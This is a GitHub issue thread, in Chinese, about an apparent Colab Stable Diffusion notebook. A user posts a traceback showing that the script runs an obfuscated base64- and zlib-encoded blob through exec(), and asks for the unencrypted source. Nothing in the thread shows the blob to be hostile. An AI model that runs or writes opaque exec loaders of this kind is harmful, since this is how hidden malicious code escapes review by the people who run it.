### ISSUE TITLE
dalao能上传一下没有加密的文件么

### ISSUE THREAD

**Issue by GENTTAS** [s4afa451dgf415f/colab_stable_diffusion#29]
Checkpoint  not found; loading fallback v1-5-pruned-emaonly.safetensors [6ce0161689]
sd-webui-prompt-all-in-one background API service started successfully.
Loading weights [6ce0161689] from /root/lk29jU/models/Stable-diffusion/v1-5-pruned-emaonly.safetensors
Traceback (most recent call last):
  File "/content/main4.py", line 2, in <module>
    exec(zlib.decompress(base64.b64decode('eJy9VMFu4jAQvecrIl8SVBypHJF86D/sDUXIhAmxMLbXdmgRyr/vDAlpWkqpethTJjNvnt/Yz1YHZ31MQ7tx3lYQQqKGzGkMbUic9PIQxLkbosUYvngvVmVSW59Kv0uVoc4Cw+PqeVkuk1TVVChClD6GVxWbPOM8m2El3cNpfZS6BYGIlQYzlMoiOK1inolshjBkoNqIngmxoHbqn/f9Y43SvcQV5kpxTYL+guV5OcJxjKcJy3XK/ltU1p3yWbIFPZAvVqxutWblfPzfSr+f/ke7B/MBoDwrE4tsDYZ5nZ0HoX2lw1mJc+08VCooa9YhesE4D430kHKu7SviMdiqIDcaeJA18NY4Ve01pJNCZU2w+MUz3Xk81I30ActveEoHuIRgLkBlAlStBw5vEQwtymVFNkDIqCMlWZgwljdS1+8RP0rSZV3kaCD+t5VbLiMSRerqC1UjjQEdtAwRU9IpllDvwzH/05y/0U9mH71Hlh/OuFARDiEnb9+e5JNg2H/u8OawggTKmI8kaPPbTXnQQSpowVEAevjOyvWFiMAd+3qlDwi8KqM1L64Wgv3xLbBvBosNHEBkhM/urHELw32Fx5xa7Zr4A9IrbiJ/uIQP9NcZ2cDsvN2L86fW7lrhHnbYIZhso2XZnW38DdNEb/+oTOS+P8yFb01eM3eKDZpTy9ZUTeFO6fl2oo7NQwNaC2KZXXf5B1S3I32i+gek8yjK')))
  File "<string>", line 38, in <module>
  File "/usr/lib/python3.10/subprocess.py", line 505, in run
    stdout, stderr = process.communicate(input, timeout=timeout)
  File "/usr/lib/python3.10/subprocess.py", line 1146, in communicate
    self.wait()
  File "/usr/lib/python3.10/subprocess.py", line 1209, in wait
    return self._wait(timeout=timeout)
  File "/usr/lib/python3.10/subprocess.py", line 1959, in _wait
    (pid, sts) = self._try_wait(0)
  File "/usr/lib/python3.10/subprocess.py", line 1917, in _try_wait
    (pid, sts) = os.waitpid(self.pid, wait_flags)
KeyboardInterrupt

隐藏的时候老是出错

**Comment by GENTTAS** [comment]
> 你可以反相 jie mi的，用python，将结果打印出来就可以了。

确实是打印出来了,但是哥们看不懂 连成一串 人都傻了
